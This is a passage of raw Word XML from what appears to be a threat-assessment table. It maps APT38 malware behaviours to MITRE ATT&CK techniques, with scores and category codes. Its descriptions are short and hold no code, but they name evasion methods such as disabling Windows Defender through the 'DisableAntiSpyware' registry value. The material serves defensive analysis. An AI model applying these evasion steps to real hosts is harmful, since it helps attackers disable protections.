            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006B0062">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">” malware </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="36B62010" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D87AA6" w14:textId="24425098" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E6192F" w14:textId="739A030A" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E60E29D" w14:textId="781B5BC6" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D6EA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1562.001: Disable or Modify Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E25FE7" w14:textId="76738B85" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5885E39A" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23797E1D" w14:textId="352C860D" w:rsidR="007E7137" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E7D8FC" w14:textId="13C55F90" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077BE2BD" w14:textId="4D3F356D" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Scenario 2 - </w:t>
            </w:r>
            <w:r w:rsidRPr="000D6EA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">When the malware is first executed, it attempts to weaken the host’s </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000D6EA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000D6EA6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> by disabling Windows Defender.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w14:paraId="078E6CA9" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4624F5EF" w14:textId="68895F8C" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FBA0A7" w14:textId="77777777" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">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2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A4EDD70" w14:textId="77777777" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E92096D" w14:textId="543805A3" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6380581D" w14:textId="77777777" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC12F3E" w14:textId="77777777" w:rsidR="000D6EA6" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073E4E25" w14:textId="3052D358" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C489523" w14:textId="77777777" w:rsidR="000D6EA6" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] See above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="736C4445" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F8D085" w14:textId="61DE9B07" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B643576" w14:textId="30186606" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E63E415" w14:textId="2C3BCC87" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1112 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Modify Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6931C8FA" w14:textId="358EB13E" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F8065F" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07194567" w14:textId="081F5F24" w:rsidR="007E7137" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F88408E" w14:textId="0168FC83" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59217402" w14:textId="5CE6DBB3" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="000D6EA6" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="0044625B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario 2 - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="212529"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Threat Actors use PowerShell to utilize Windows API features which can be abused to modify registry key values such as “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="212529"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>DisableAntiSpyware</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="212529"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00173995" w:rsidRPr="00646EAA" w14:paraId="2A3BB7C8" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C3803E1" w14:textId="1A680EE0" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF9A249" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D39DCE" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B59AA69" w14:textId="5AD4FB14" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29EB53AD" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F5E7A8" w14:textId="77777777" w:rsidR="00173995" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC4E505" w14:textId="623CBC57" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B92CFD3" w14:textId="3A423F8C" w:rsidR="00173995" w:rsidRPr="00646EAA" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Scenario 3 - </w:t>
            </w:r>
            <w:r w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>trojanized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> software installers delivered by the phishing links are used to download a second stage backdoor to the host. In these attacks APT38 was delivering variants of their </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Manuscrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor</w:t>
            </w:r>
            <w:r w:rsidR="00145047">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (AKA </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00145047">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CopperHedge</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00145047">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00145047">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Nukesped</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00145047">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B6EA9" w:rsidRPr="00646EAA" w14:paraId="638720F8" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481C0663" w14:textId="5208B757" w:rsidR="004B6EA9" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762DEA3D" w14:textId="51EFA48F" w:rsidR="004B6EA9" w:rsidRPr="00E9532A" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A80240A" w14:textId="0DF93914" w:rsidR="004B6EA9" w:rsidRPr="00E9532A" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">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1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004B6EA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F37378" w14:textId="2DD71E5A" w:rsidR="004B6EA9" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16A18249" w14:textId="77777777" w:rsidR="004B6EA9" w:rsidRPr="00646EAA" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D0FED22" w14:textId="30B43CFC" w:rsidR="004B6EA9" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="770902AF" w14:textId="7133E93D" w:rsidR="004B6EA9" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
